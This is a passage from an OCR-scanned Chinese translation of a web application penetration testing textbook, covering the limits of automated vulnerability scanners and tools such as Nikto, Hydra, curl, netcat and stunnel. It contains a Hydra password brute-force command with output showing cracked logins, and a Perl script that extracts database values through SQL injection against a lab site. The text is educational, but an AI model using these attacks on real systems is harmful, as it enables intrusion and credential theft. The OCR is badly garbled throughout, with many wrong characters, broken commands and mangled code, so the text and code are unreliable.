其 中 一 些 挑 战 并 非 无 法 克服 ， 如 今 的 扫描 絮 已 狐 增 了 各 种 功能 ， 
可 在 一 定 程 度 上 克服 这 些 挑战 。 但 是 ， 扫 描 并 不 古 一 种 完美 的 解决 方 
案 ， 现 代 扫 描 撤 术 的 效率 因 不 同 应 用 程序 而 异 。 

1. 验证 与 会 话 处 理 

扫描 硕 必 须 能 够 处 理 各 种 应 用 程序 使 用 的 验证 与 会 话 处 理 机 制 。 
通常 ， 应 用 程序 的 绝 大 多 数 功 能 只 有 使 用 通过 验证 的 会 话 才能 访问 ; 
如 打扫 描 硕 不 能 获得 这 样 的 会 话 ， 它 融会 遗漏 许多 可 以 探测 的 漏洞 。 

当前 ， 扫 搞 郁 用 户 通过 提供 一 段 登 孙 脚本 ， 或 者 使 用 内 置 的 浏览 
妖 完 成 验证 过 程 ， 帮 助 扫 摘 右 按照 特定 的 步 又 获得 通过 验证 的 会 话 ， 
从 而 解决 验证 方面 的 问题 。 

会 话 处 理 方面 的 挑战 更 难以 解决 ， 包 括 以 下 两 个 问题 。 

口 扫描 需 必 须 能 够 与 应 用 程序 使 用 的 会 话 处 理 机 制 区 互 。 这 可 能 
要 求 在 cookie、 隐 藏 表单 字段 或 URL 碍 询 字 符 串 中 传送 会 话 令 牌 。 令 
牌 可 能 在 整个 会 话 过 程 中 保持 静态 ， 或 者 根据 每 个 请 求 而 发 生变 化 ， 
或 者 应 用 程序 可 能 会 采用 一 种 完全 不 同 的 定制 机 制 。 

口 如 有 果 会 话 已 经 失效 ， 扫 搬 右 必须 能 够 了 解 这 一 情况 ， 并 返回 到 
验证 阶段 获得 一 个 新 的 会 话 。 造 成 会 话 失 效 的 原因 很 多 ， 例 如 ， 因 为 
扫描 硕 请 求 了 退出 功能 ， 或 者 因为 扫 摘 锅 进 行 了 反 利 导航 或 所 区 了 时 
种 无 效 的 输入 ， 导 致 应 用 程序 终止 了 会 话 。 在 最 初 解析 应 用 程序 及 随 
后 探 得 漏洞 的 过 程 中 ， 扫 描 硕 必须 能 够 探测 到 这 两 种 情况 。 如 果 会 话 
失效 ， 不 同 的 应 用 程序 会 表现 出 不 同 的 行为 ， 而 扫描 天 也 只 会 分 析 应 
用 程序 啊 应 的 语法 内 容 。 通 常 而 言 ， 这 可 能 是 一 个 难以 应 对 的 挑战 ， 
应 用 程序 使 用 非 标准 的 会 话 处 理 机 制 时 尤其 如 此 。 

公平 地 讲 ， 今 天 的 一 些 扫 摘 硕 能 够 检测 出 应 用 程序 采用 的 绝 大 多 
数 验 证 和 会 话 处 理 机 制 。 但 是 ， 仍 然 存 在 许多 扫 摘 器 无 法 处 理 的 情 
况 。 因 此 ， 它 们 可 能 无 法 抓 取 或 扫 摘 应 用 程序 的 主要 受 攻击 面 。 由 于 
独立 扫 摘 右 完 全 以 目 动 方式 运行 ， 用户 通 常 难以 察觉 这 种 缺陷 。 

2. 危险 的 后 果 

在 许多 应 用 程序 中 ， 不 遵循 任何 指导 而 进行 无 限制 的 扫 朱 ， 可 能 
会 给 应 用 程序 及 其 包含 的 数据 市 来 极 大 的 风险 。 例 如 ， 扫 摘 右 可 能 会 
发 现 一 个 包含 重 设 密码 、 删 除 账户 等 功能 的 管理 页 面 。 扫 描 右 冒 目地 
请 求 每 一 项 功能 可 能 会 导致 应 用 程序 拒绝 所 有 用 户 的 访问 请 求 。 同 
样 ， 扫 描 颖 可 能 会 发 现 一 个 可 被 用 于 疗 重 破坏 应 用 程序 数据 的 漏洞 。 
例如 ， 在 一 些 SQL 注 入 漏洞 中 ， 提 交 标 准 的 SQL 攻 击 字符 串 (如 or 
1=1--) 可 能 会 使 应 用 程序 的 数据 遭受 无 法 预料 的 操作 。 这 时 ， 知 道 某 
项 特殊 功能 的 作用 的 人 会 前 慎 行 事 ， 但 目 动 扫 摘 融 却 缺乏 这 种 认识 。 


3.“ 个 性 化 ”功能 
T 纯粹 对 应 用 程序 进行 语法 分 析 并 不 能 准确 判定 它 的 核 
ÒE 能 : 

口 一 些 应 用 程序 虽 包含 数目 庞大 的 内 容 ， 但 它们 体现 的 却 是 一 组 
相同 的 核心 功能 。 例 如 ，eBay、MySpace 与 Amazon 这 些 应 用 程序 含有 
数 百 万 个 包含 不 同 URL 与 内 容 的 不 同 应 用 程序 页 面 ， 但 这 些 页面 仅 对 
应 少数 几 个 应 用 程序 功能 。 

口 如 果 仅 从 语法 角度 分 析 ， 一 些 应 用 程序 可 能 并 没有 明确 的 边 
界 。 例 如 ， 日 历 应 用 程序 允许 用 户 导航 至 任何 日 期 。 同 样 ， 一 些 内 容 
有 限 的 应 用 程序 在 不 同 的 场合 采用 易 变 的 URL 或 请 求 参数 访问 相同 的 
内 容 ， 导 致 扫 撒 属 继 续 对 应 用 程序 的 内 容 进 行 不 确定 的 解析 。 

口 扫描 恬 本 吴 的 操作 可 能 会 导致 一 些 似乎 是 全 新 的 内 容 出 现 。 例 
如 ， 提 交 一 个 表单 可 能 会 使 应 用 程序 在 界面 上 显示 一 个 新 的 链接 ， 访 
问 这 个 链接 可 能 会 获得 另外 一 个 作用 相同 的 表单 。 

在 上 述 任 何 一 种 情况 下 ， 渗 透 测试 员 能 够 立即 “看 透 > 应 用 程序 的 
请 求 内 容 ， 确 定 需 要 测试 的 核心 功能 ， 但 不 了 解 语法 的 目 动 扫 摘 器 却 
很 难 做 到 这 一 点 。 

除 上 壕 解 析 和 探查 应 用 程序 过 程 中 出 现 的 明显 问题 处 ， 在 报告 已 
发 现 的 漏洞 过 程 中 也 出 现 了 一 个 相关 的 问题 : 纯粹 基于 语法 进行 分 析 
的 扫描 噩 很 可 能 会 重复 报告 同一 个 漏洞 。 例 如 ， 一 个 扫描 报告 确定 了 
200 个 XSS 漏 洞 ， 其 中 有 195 个 出 现在 扫描 器 多 次 探查 的 同一 项 应 用 程 
序 功 能 中 ， 因 为 这 个 漏洞 通过 不 同 的 语法 内 容 出 现在 不 同 的 场合 中 。 
4. 其 他 自动 控制 挑战 

我 们 在 第 14 章 讲 过 ， 一 些 应 用 程序 会 实施 专门 的 防御 措施 ， 防 止 
目 动 化 客户 端 程序 访问 它们 。 这 些 措施 包括 : 直到 反常 行为 时 反应 性 
地 终止 会 话 ， 使 用 CAPTCHA 和 其 他 控件 确保 一 些 特殊 的 请 求 由 某 一 
名 用 户 提 出 。 

通常 ， 扫 拉 恬 的 抓 取 功能 面临 和 Web 应 用 程序 爬虫 相同 的 挑战 ， 
如 定制 化 “未 发 现 * 啊 应 ， 能 够 解释 客户 端 代码 。 许 多 应 用 程序 对 特殊 
的 输入 项 (例如 ， 用 户 注 册 表 单 中 的 字段 ， 进 行 严 格 的 确认 。 如 果 反 
虫 同 表单 提交 无 效 的 输入 ， 并 且 不 能 理解 应 用 程序 生成 的 错误 消 筷 ， 
那么 它 就 无 法 通过 这 个 表单 访问 它 之 后 的 一 些 重要 功能 。 

Web 技 术 的 快速 发 展 ， 特 别 是 各 种 浏 顺 需 扩 展 组 件 和 其 他 框 殿 在 
客户 端 上 的 应 用 ， 使 大 多 数 扫 摘 器 都 落后 于 最 新 的 技术 发 展 趋 势 。 这 
会 导致 扫 撒 才 无 法 确定 在 应 用 程序 中 提出 的 所 有 相关 请 求 ， 或 无 法 确 
定 应 用 程序 请 求 所 需 的 准确 格式 和 内 容 。 


此 外 ， 当 前 Web 应 用 程序 高 度 状 态 化 ， 以 及 复杂 数据 在 客户 端 和 
服务 硕 端 上 保存 并 通过 这 二 者 之 间 的 异步 通信 进行 更 新 的 特点 ， 都 会 
为 大 多 数 倾 问 于 单独 处 理 每 个 请 求 的 全 目 动 扫描 硕 制 造 问 题 。 为 完全 
渔 雷 这 些 应 用 程序 ， 通 利 有 必要 了 解 它 们 采用 的 多 阶段 请 求 过 程 ， 并 
确 你 应 用 程序 处 于 所 需 的 状态 ， 以 处 理 特 定 的 攻击 请 求 。 我 们 在 第 14 
章 介绍 了 在 定制 的 目 动 化 攻击 中 实现 这 一 目标 的 技巧 。 通 常 ， 采 用 这 
些 技 巧 需 要 进行 人 为 干预 ， 以 了 解 相关 要 求 、 对 测试 工具 进行 迄 当 地 
配置 ， 并 监视 它们 的 性 能 。 


20.3.4 ”当前 产品 


近年 来 ， 目 动 化 Web 扫 揪 絮 市 场 有 了 很 大 发 展 ， 出 现 了 各 种 创 
新 ， 并 涌现 出 一 系列 不 同 的 产品 。 以 下 是 一 些 最 主要 的 扫描 需 : 
口 AcunetiX 
J AppScan 
Burp Scanner 
g Hailstorm 
口 NetSparker 
口 N-Stalker 
DNTOSpider 
口 Skipfish 
口 WebInspect 
虽然 大 多 数 成 熟 扫 描 强 都 具备 相同 的 核心 功能 ， 但 是 ， 在 如 何 检 
测 不 同 漏洞 区 域 ， 以 及 向 用 户 提供 的 功能 方面 ， 这 些 扫 描 帮 之 间 仍 然 
存在 差异 。 有 关 不 同 扫描 妖 的 优点 的 公开 讨论 大 多 以 供应 商 之 间 的 口 
水 战 而 结束 。 尽 管 人 们 进行 了 各 种 测试 来 评 佑 不同 扫描 需 在 检测 不 同 
类 型 的 安全 漏洞 方面 的 性 能 ， 但 是 ， 这 类 测试 始终 仅 限 于 将 扫描 器 用 
于 扫描 一 小 段 存在 缺陷 的 示例 代码 ， 因 此 ， 这 些 测试 结果 并 不 足以 推 
叶 扫 拉 器 在 各 种 实际 情况 下 的 性 能 。 
最 有 效 的 测试 方法 ， 是 针对 大 量 源 目 真 实 应 用 程序 的 示例 代码 运 
行 扫描 器 ， 而 不 是 在 分 析 之 前 为 供应 商 提供 基于 示例 代码 调整 其 产品 
的 机 会 。 加 州 大 学 圣 芭 芭 拉 分 校 的 一 项 此 类 学 术 人 研究 声称 其 “在 所 测试 
的 工具 数量 .……… 以 及 所 分 析 的 漏洞 类 型 方面 ， 是 最 大 规模 的 Web 应 用 
程序 扫描 右 评 估 ”。 有 关 此 项 研究 的 报告 ,请 从 以 下 URL 下 载 : 
www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf 


这 项 研究 的 主要 结论 如 下 : 


口 即使 是 最 先进 的 扫描 吉 ， 也 无 法 检测 出 所 有 类 型 的 漏洞 ， 包 丘 
脆弱 密码 、 访 问 控 制 不 完善 和 逻辑 缺陷 。 

口 由 于 对 和 用 客户 端 技术 文 持 不 完全 ， 以 及 当前 应 用 程序 的 复杂 
状态 化 特点 ， 束 目前 的 Web 调 洞 扫描 硕 而 言 ， 抓 取现 代 Web 应 用 程序 
可 能 是 一 项 严峻 的 挑战 。 

口 价格 与 性 能 之 间 并 没有 明显 的 对 应 关系 。 一 些 免 费 或 价格 非常 
低廉 的 扫 摘 需 与 那些 售 价 数 千 美 元 的 扫描 融 的 性 能 相当 。 

基于 扫描 融 确定 不 同类 型 漏洞 的 能 力 ， 这 项 人 研究 对 扫 摘 大 进行 了 
打分 。 每 种 扫 摘 妖 的 忌 得 分 和 价格 如 表 20-1 所 示 。 


表 20-1 UCSB 针 对 不 同 扫 描 器 的 漏洞 检测 性 能 与 价格 的 研究 报告 


A fh 器 分 数 价 格 
Acunetix 14 4995~-6350 美 元 
WebInspect 13 6000~30 000 美 元 
Burp Scanner 13 191 美 元 

N-Stalker 13 899~6299¥ 7t 
AppScan 10 17 550~32 500 美 元 
w3af 9 免费 

Paros 6 免费 

HailStorm 6 10 000 美 元 
NTOSpider 4 10 000 美 元 
MileSCAN 4 495~1495 美 元 
Grendel-Scan 3 免费 


需要 注意 的 是 ， 近 年 来 ,扫描 器 的 扫描 能 力 已 有 了 显著 提高 ， 并 
可 能 会 继续 改进 。 个 体 扫描 絮 的 性 能 和 价格 可 能 会 随时 间 而 变化 。 表 
20-1 中 的 报告 信息 于 2010 年 6 月 公布 。 

由 于 有 关 Web 漏 洞 扫描 器 性 能 的 公开 信息 相对 较 少 ， 因 此 ， 在 做 
出 购买 决策 之 前 ， 渗 透 测试 员 需 要 上 自己 进行 这 方面 的 调查 。 大 多 数 扫 
描 器 供应 商都 提供 详细 的 产品 文档 及 其 软件 的 试用 版 本 ， 渗 透 测 试 员 
可 以 利用 这 些 信息 做 出 产品 选择 。 


20.3.5 “使 用 漏洞 扫描 器 


现实 情况 下 ， 使 用 调 洞 扫描 硕 的 效率 高 低 很 大 程度 上 取决 于 所 针 
对 的 是 何 种 应 用 程序 。 根 据 应 用 程序 的 功能 及 其 包含 的 漏洞 种 类 ， 我 
们 上 面 介 绍 的 扫描 融 的 内 在 优 缺 点 会 以 不 同 的 方式 影响 不 同 的 应 用 程 
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它们 能 够 很 好 地 确认 特定 的 漏洞 。 总 之 ， 进 行 目 动 扫描 能 够 确定 一 个 
常见 应 用 程序 中 存在 的 一 些 但 并 非 全 部 明显 的 漏洞 。 

如 采 是 一 名 渗透 测试 狐 手 ， 或 者 需要 在 有 限 的 时 间 内 攻击 一 个 大 
型 应 用 程序 ， 那 么 进行 目 动 扫描 的 好 处 极其 明显 ， 因 为 它 能 够 迅速 确 
定 一 些 需 要 进行 深入 手动 调查 的 线索 ， 并 帮助 初步 确定 应 用 程序 的 安 
全 状态 以 及 其 中 存在 的 漏洞 类 型 。 它 还 可 帮助 全 面 了 解 目标 应 用 程 
序 ， 并 确定 任何 需要 仔细 分 析 的 特殊 区 域 。 

如 果 是 一 名 Web 应 用 程序 渗透 测试 专家 ， 并 且 和 希望 从 目标 应 用 程 
序 中 发 现 尽 可 能 多 的 漏洞 ， 那 么 ， 需 要 认识 调 洞 扫描 夯 的 内 在 局 限 
性 ， 并 且 不 能 完全 相信 和 它们， 认为 它们 能 够 发 现 每 一 个 漏洞 。 虽 然 扫 
描 结 采 会 有 所 帮助 ， 并 提示 手动 调查 一 些 特殊 的 问题 ; 但 是 ， 通 第 我 
们 希望 对 应 用 程序 的 每 个 功能 区 域 进 行 测 坛 ， 碍 找 每 一 种 类 型 的 漏 
洞 ， 以 确信 对 其 进行 了 全 面 的 扫描 。 

当 使 用 漏洞 扫描 器 时 ， 必 须 始 终 记 住 以 下 一 些 要 点 ， 以 充分 利用 
这 种 工具 。 
口 了 解 扫描 厚 能 够 确定 和 不 能 够 确定 的 漏洞 类 型 。 
口 熟 悉 扫描 器 的 功能 ， 知 道 如 何 对 其 进行 配置 ， 对 某 个 应 用 程序 
进行 有 效 扫 摘 。 
人 
9 功能 o 
口 了 解 抓 取 强 大 的 功能 和 目 动 探查 危险 漏洞 级 合 的 风险 。 
口 始 终 手 动 核实 扫 搞 船 报 告 的 所 有 潜在 的 漏洞 。 
口 还 要 意识 到 ， 扫 摘 右 可 能 会 造成 极 大 的 混乱 ， 在 服务 器 与 IDS 防 
御 中 留 下 大 量 “ 指 纹 ”。 如 采 想 要 保持 隐秘 ， 不 要 使 用 扫描 需 。 

全 自动 化 扫描 与 用 户 指导 的 扫描 


在 使 用 Web 扫 摘 希 时 ， 一 个 主要 的 考虑 事项 ， 是 渗透 测试 员 和 希望 
在 多 大 程度 上 指导 扫描 器 完成 各 种 工作 。 这 方面 的 两 个 极端 用 例如 


Fo 
口 为 扫描 恬 提 供应 用 程序 的 URL， 单 击 “ 开 始 ”(Go) , RSA 
ER 6 


结 
i D ITFA, AHH Sie Mak, ETE 
测试 。 

独立 Web 扫 摘 絮 更 适 于 第 一 种 用 例 。 整 合 到 集成 测试 套件 中 的 扫 
ee ° 也 就 是 说 ， 如 果 需 要 ， 可 以 结合 采用 这 两 类 
Ties ° 

如 果 用 户 对 于 Web 应 用 程序 安全 不 其 了 解 ， 或 需要 快速 评估 某 个 
应 用 程序 ， 或 需要 经 常 处 理 大 量 应 用 程序 ， 则 可 以 通过 全 自动 化 扫 摘 
了 解 应 用 程序 的 一 部 分 受 攻 击 面 。 这 样 做 有 助 于 用 户 在 确定 更 全 面 测 
试 的 效率 时 做 出 明智 的 决策 。 

如 果 用 户 了 解 Web 应 用 程序 安全 测试 的 整个 过 程 ， 以 及 全 目 动 化 
测试 的 限制 ， 则 最 好 是 使 用 集成 测试 套件 中 的 扫 摘 器 ， 从 而 为 手动 测 
试 过 程 提 供 文 持 ， 并 提高 手动 测试 的 效率 。 这 种 方法 有 助 于 避免 全 目 
动 扫 摘 絮 面临 的 诸多 技术 挑战 。 渗 透 测 试 员 可 以 使 用 浏览 絮 指 导 扫 摘 
铬 进行 操作 ， 以 确保 不 会 遗漏 关键 的 功能 区 域 。 渗 透 测 试 员 可 以 直接 
测试 应 用 程序 生成 的 、 其 中 包含 应 用 程序 所 需 的 正确 内 容 和 请 求 格 
式 。 由 于 能 够 完全 控制 测试 过 程 ， 因 此 能 够 避 开 危险 功能 、 识 别 重复 
功能 ， 并 避 开 目 动 扫描 器 可 能 会 遇 到 困难 的 任何 输入 和 确认。 此外， 由 
于 可 以 收 到 有 关 扫 描 器 活动 的 直接 反馈 ， 因 而 可 以 确保 避免 与 验证 和 
会 话 处 理 机 制 有 关 的 问题 ， 并 确保 正确 处 理 多 阶段 过 程 和 有 状态 功能 
造成 的 问题 。 通 过 以 这 种 方式 使 用 扫 摘 絮 ， 可 以 履 盖 一 系列 可 以 自动 
ee ATT BE He BSP Fs ee SS AZ PE A ED] 
类 型 。 


20.4 工 


除 前 面 讨论 的 工具 外 ， 在 特殊 情况 下 或 执行 特殊 任务 时 渗透 测试 
员 还 可 以 使 用 许多 其 他 工具 。 在 本 章 的 剩余 部 分 ， 我 们 将 介绍 其 他 几 
种 攻击 应 用 程序 时 可 能 过 到 或 需要 使 用 的 工具 。 需 要 注意 的 是 ， 以 下 
内 容 仅 仅 简要 介绍 了 笔者 曾 使 用 的 一 些 工 具 。 建 议 渗透 测试 员 调 碍 各 
种 可 用 的 工具 ， 并 选择 最 适合 目 己 需 求 和 测试 风格 的 那些 工具 。 


20.4.1 Wikto/Nikto 


Nikto 可 人 确定 Web 服 务 器 上 默认 或 常见 的 第 三 方 内 容 。 它 包含 一 个 
大 型 文件 和 目录 数据 库 ， 其 中 含有 Web 服 务 器 上 的 默认 页 面 与 脚本 以 
及 购物 篮 之 类 的 第 三 方 软件 。 基 本 上 ， 这 个 工具 轮流 请 求 上 述 每 一 种 
项 目 ， 然 后 探查 它们 是 否 存在 。 

数据 库 会 频繁 更 新 ， 这 意味 着 Nikto 能 够 比 其 他 任何 自动 或 手动 技 
巧 更 有 效 地 确定 这 种 类 型 的 内 容 。 

Nikto 包 含 大 量 可 通过 命令 行 或 基于 文本 的 配置 文件 指定 的 配置 选 
项 。 如 果 应 用 程序 使 用 定制 化 “未 发 现 "页 面 ， 渗 透 测 试 员 可 以 通过 使 
用 -404 设 置 避 免 错 误 警 报 ， 该 设置 允许 指定 一 个 出 现在 定制 错误 页 面 
中 的 字符 串 。 

Wikto 是 Nikto 的 Windows 版 本 ， 该 版 本 新 增 了 一 些 功 能 ， 如 增强 了 
对 “未 发 现 ” 咱 应 的 检测 和 Google 辅 助 的 目录 挖掘 。 


20.4.2 Firebug 


Firebug 是 一 种 浏览 器 调试 工具 ， 使 用 它 可 以 在 当前 显示 的 页 面 上 
调试 和 编辑 HTML 及 JavaScript 脚 本 ， 还 可 以 通过 它 浏 览 和 编辑 DOM e 

Firebug 具 有 非常 强大 的 功能 ， 可 用 于 分 析 和 利用 一 系列 客户 端 攻 
击 ， 包 括 各 种 跨 站 点 脚本 、 请 求 伪 造 、UI 伪 装 和 跨 域 数据 捕获 攻击 
《如 第 13 章 所 述 ) 。 


20.4.3 Hydra 


Hydra 十 一 种 用 途 广 泛 的 密码 猜测 工具 ， 可 用 于 攻击 Web 应 用 程序 
常用 的 基于 表单 的 验证 。 当 然 ， 也 可 以 使 用 Burp Intruder 之 类 的 工具 以 
完全 定制 的 方式 实施 这 种 攻击 ; 但是， 在 许多 情况 下 ，Hydra 也 一 样 有 


用 。 

可 以 使 用 Hydra 指 定 目标 URL、 相 关 请 求 参数 、 攻 击 用 户 名 和 密码 
字段 的 单词 列表 ， 以 及 登录 失败 后 返回 的 错误 消 忌 细 市 。-t 设 置 可 用 
于 指定 在 攻击 中 使 用 的 并 行 线程 的 数量 。 例 如 : 


C:\>hydra.exe -t 32 -L user.txt -P password.txt wahh-app.com http-post-form 


"/login. asp: login_name=“USER“&login_password=“PASS*&Login=Legin: Invalia" 
: > 4 En a 


Hydra v6.4 (c) 2011 by van Hauser / THC - use allowed only for legal 
purpos 
Hyd ttg tk rq) jy at 20 C 16 
[DAT 3 ervers es {1:148/p:148}, es pe 
task 
JATA] t king < ttp-g t ¢ | t 8 
[STATUS] 397.00 tries/min, 397 tries in 00:0ih, 21507 todo in 00:55h 
[80] [www-form) host: 65.61.137.117 ogin: alice password: password 
[80] [www-form] host: 65.61.137.117 login: liz password: password 


20.4.4 ”定制 脚本 


根据 我 们 的 经 验 ， 现 有 的 各 种 非 定制 工具 足以 帮助 渗透 测试 员 完 
成 在 攻击 Web 应 用 程序 时 所 需 执 行 的 绝 大 多 数 任务 。 但 是 ， 在 各 种 反 
Lt 下 ， 需 要 目 行 建立 完全 定制 的 工具 和 脚本 来 解决 特定 的 问题 ， 
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口 应 用 程序 使 用 一 种 不 常见 的 会 话 处理 机 制 ， 例 如 ， 需 要 使 用 必 
须 按 正确 顺序 重 独 提交 的 每 页 面 令 牌 。 
口 希 望 利用 一 个 需要 重复 执行 几 个 特殊 步骤 的 漏洞 ， 将 在 一 个 咖 
Y 中 获取 的 数据 合并 到 随后 的 请 求 中 。 
口 如 采 硝 定 一 个 潜在 恶意 的 请 求 ， 应 用 程序 会 立即 终止 会 话 ; 同 
时 ， 获 得 一 个 新 的 通过 验证 的 会 话 需 要 采取 几 个 非 标准 的 步 又 。 
口 需 要 疝 应 用 程序 所 有 者 提供 “ 指 疝 并 单 击 * 利 用 过 程 ， 以 演示 该 
漏 铜 及 其 风险 。 

如 会 编程 ， 那 么 解决 这 个 问题 的 最 位 单方 法 ， 束 是 创建 一 个 完 
全 定制 的 小 型 程序 ， 使 用 它 发 布 相关 请 求 并 处 理应 用 程序 的 啊 应 。 可 
以 把 这 个 程序 作为 一 个 独立 的 工具 ， 或 者 作为 前 面 描述 的 集成 测试 套 


件 的 扩展 ， 例 如 ， 通 过 使 用 Burp Extender 接 口 扩展 Burp Suite 或 Bean 
Shell 接 口 扩展 WebScarab。 

Perl 等 脚本 语言 包含 许多 可 用 于 迅速 建立 HITP 通 信 的 库 ， 通 弟 ， 
仅 使 用 几 行 代码 天 可 以 执行 定制 任务 。 即 使 编程 经 验 有 限 ， 也 可 以 在 
因特网 上 找到 一 段 脚本 ， 然 后 对 其 进行 调整 ， 以 满足 需求 。 下 面 以 一 
段 简单 的 Pen 脚本 为 例 ， 它 利用 一 个 登录 表单 中 的 SQL 注入 漏洞 进行 递 
归 查 询 ， 获 取 数 据 表 中 指定 列 中 的 所 有 值 ， 并 将 获得 的 值 从 大 到 小 排 
列 (请 参阅 第 9 章 了 解 这 种 攻击 的 更 多 详情 ) : 


use HTTP: : Request : :Common; 
use LWP: :UserAgent ; 


$ua = LWP: :UserAgent->new() ; 
my $col = @ARGV[1]; 
my $from_stmt = @ARGV[3]; 


if ($#ARGV!=3) { 
print "usage: perl sql.pl SELECT column FROM table\n"; 
exit; 


while(1) 


$payload = "foo' or (1 in (select max($col) from $from_stmt 
$test))--"; 


my $req = POST “http://mdsec.net /addressbook/32/Default .aspx", 
[__VIEWSTATE => '', Name => $payload, Email => ‘john@test. 

Com', Phone => 

‘12345', Search => ‘Search', Address => '1 High Street', Age => 

oa Us 

my $resp = $ua->request ($req) ; 

my $content = $resp->as_string; 

#print $content; 


if ($content =~ /nvarchar value ' (.*)'/) 


{ 
print "$1\n"; # print the extracted match 
} 


else 
{exit; } 
Stest = “where $col < '$1' "; 


} 


尝试 访问 


http://mdsec.net/addressbook/32/ 


除 内 置 命令 与 库 外 ， 还 可 以 从 Perl 脚 本 与 操作 系统 shell 脚 本 中 调用 
各 种 简单 的 工具 和 实用 工具 。 下 面 分 别 介绍 几 个 这 样 的 工具 。 

1. Wget 

Wget 是 一 个 有 用 的 工具 ， 可 使 用 HTTP 或 HTTPS 获 取 一 个 特殊 的 
URL 。 它 支持 “下 行 ” 代 理 服务 器 、HTTP 验 证 和 其 他 各 种 配置 选项 。 

2. curl 

curl 是 一 个 用 于 发 布 HTTP 与 HTTPS 请 求 的 最 灵活 的 命令 行 工 具 。 
它 支 持 GET 方 法 、POST 方 法 、 请 求 参数 、 客 户 端 SSL 证 书 和 HTTP 验 
证 。 在 下 面 的 示例 中 ， 重 复 检索 页 面 标题 ， 以 获得 10~-40 之 间 的 页 面 
ID 值 。 


#!/bin/bash 


n seq 10 40 
do 
echo -n $i * 

s http: //masec.net/app/ShowFage.ashx?PageNo==$i | grep -Po 
wet le>({.*)</title>" | sed 's/....... ora ae fe 


尝试 访问 


http://mdsec.net/app/ 


3. netcat 

netcat 是 一 个 功能 非常 强大 的 工具 ， 可 用 于 执行 各 种 与 网 络 有 关 的 
任务 ， 它 还 是 许多 初学 者 攻击 教程 的 基础 。 可 以 使 用 它 与 服务 絮 建 并 
TCP 连 接 ， 发 送 一 个 请 求 并 获得 它 的 响应 。 除 以 上 用 途 外 ，netcat 还 可 
用 于 在 计算 机 上 创建 网 络 监 听 器 ， 接 收 所 攻击 的 服务 器 建立 的 连接 。 
了 解 使 用 这 种 技巧 在 数据 库 攻 击 中 创建 一 个 带 外 通道 的 
实例 。 

netcat 本 号 并 不 文 持 SSL 连 接 ; 但 将 它 与 下 面 描述 的 stunnel 工 具 结 
合 ， 即 可 建立 SSL 连 接 。 

4. stunnel 

stunnel 在 使 用 自己 的 脚本 或 其 他 本 吴 并 不 支持 HTTPS 连 接 的 工具 
时 非常 有 用 。stunnel 可 帮助 渗透 测试 员 与 任何 主机 或 服务 器 SSL 套 接 
字 建 立 客 户 端 SSL 连 接 ， 以 监听 任何 客户 端 提 出 的 连接 请 求 。 由 于 
HTTPS 只 是 一 种 通过 SSL 传 送 的 简单 HITP 协 议 ， 因 此 可 以 使 用 stunnel 
为 任何 其 他 工具 提供 HTTPS 能 力 。 

例如 ， 下 面 的 命令 配置 stunnel 在 本 地 回环 接口 的 88 端 口上 建立 一 
个 简单 的 TCP 服 务 器 套 接 字 。 当 收 到 一 个 连接 时 ， 它 再 与 位 于 wahh- 
app.com 的 服务 器 进行 SSL 协 议 ， 通 过 SSL 信 道 将 进入 的 明文 连接 转送 
到 这 个 服务 絮 : 


‘:\pin>stunnel 


现在 ， 可 以 将 任何 没有 SSL 能 力 的 工具 指 癌 回 环 接口 的 88 端 口 ， 
使 它 通 过 HTTPS 与 目标 服务 器 建立 通信 ， 代 码 如 下 : 


2011.01.08 15:33:20 LOGS[1288:1000]: wahh-app.com.443 connected 
from 12720043 37T13 

2011.01.08 15:33:26 LOG5[1288:1000]: Connection closed: 16 bytes 
sent to SSL, 392 bytes sent to socket 


20.5 ”人 小结 


本 书 主要 介绍 的 是 攻击 Web 应 用 程序 时 渗透 测试 员 可 以 使 用 的 实 
用 技巧 。 尽 管 只 需要 使 用 一 个 浏览 郁 吏 可 以 完成 其 中 一 些 任 务 ， 但 
征 ， 要 对 应 用 程序 实施 全 面 有 效 的 攻击 ， 需 要 使 用 一 些 有 用 的 工具 。 

拦截 代理 服务 需 是 工具 包 中 最 重要 、 也 是 必 不 可 少 的 工具 ， 可 以 
使 用 它 查 看 和 修改 浏览 絮 与 服务 絮 之 则 传送 的 所 有 流量 。 今 天 的 代理 
服务 器 还 与 大 量 其 他 集成 工具 相互 补充 ， 这 些 工 具 可 帮助 渗透 测试 员 
目 动 完成 所 需要 执行 的 许多 任务 。 除 使 用 上 述 工具 套件 外 ， 还 需要 使 
用 一 个 或 几 个 浏 咒 絮 扩展 ， 帮 助 渗透 测试 员 在 无 法 使 用 代理 服务 器 的 
情况 下 继续 实施 攻击 。 

Web 应 用 程序 扫描 侨 是 男 一 种 重要 工具 。 这 些 工具 能 够 迅速 有 效 
地 发 现 一 系列 常见 的 漏洞 ， 并 且 能 够 解析 和 分 析 应 用 程序 的 功能 。 即 
便 如 此 ， 还 是 有 许多 安全 漏洞 它们 根本 无 法 确定 ， 因 此 ， 绝 不 能 依赖 
它 来 确保 任何 应 用 程序 的 安全 。 

最 后 ， 要 成 为 一 名 技术 熟练 的 Web 应 用 程序 渗透 测试 员 ， 还 必须 
了 解 Web 应 用 程序 的 运行 机 制 、 它 们 的 防御 机 制 的 弱点 ， 并 了 解 如 何 
探查 其 中 存在 的 可 被 利用 的 漏洞 。 为 了 有 效 地 完成 这 些 任务 ， 需 要 一 
些 工 具 ， 以 了 解 应 用 程序 的 逻辑 ， 准 确 控 制 与 应 用 程序 的 交互 ， 并 在 
必要 时 利用 目 动 控制 迅速 可 靠 地 实施 攻击 。 那 些 对 实现 这 些 目标 最 有 
帮助 的 工具 ， 束 是 最 适合 使 用 的 工具 。 此 外 ， 如 果 现 有 的 工具 并 不 能 
ne 
难 ! 


第 21 章 
Web 应 用 程序 渗透 测试 方法 论 


本 章 介绍 一 种 详细 的 进 阶 方法 论 ， 渗 透 测 试 员 在 攻击 Web 应 用 程 
序 时 可 将 其 作为 指导 思想 。 它 涵盖 了 本 书 描述 的 所 有 漏洞 与 攻击 技 
巧 。 虽 然 执 行 这 个 方法 论 中 的 所 有 步骤 并 不 能 确保 发 现 某 个 应 用 程序 
中 的 所 有 漏洞 ， 但 是 ， 它 可 以 帮助 探查 应 用 程序 受 攻击 面 的 所 有 必要 
区 域 ， 并 利用 有 效 的 资源 发 现 尽 可 能 多 的 漏洞 ， 这 就 为 实现 渗透 测试 
目的 提供 了 保证 。 

这 种 方法 论 探查 的 主要 区 域 如 图 21-1 所 示 。 根 据 这 张 图 ， 我 们 将 
深入 分 析 每 一 个 区 域 ， 并 举例 说 明 其 中 的 每 一 项 任务 。 图 中 的 数字 与 
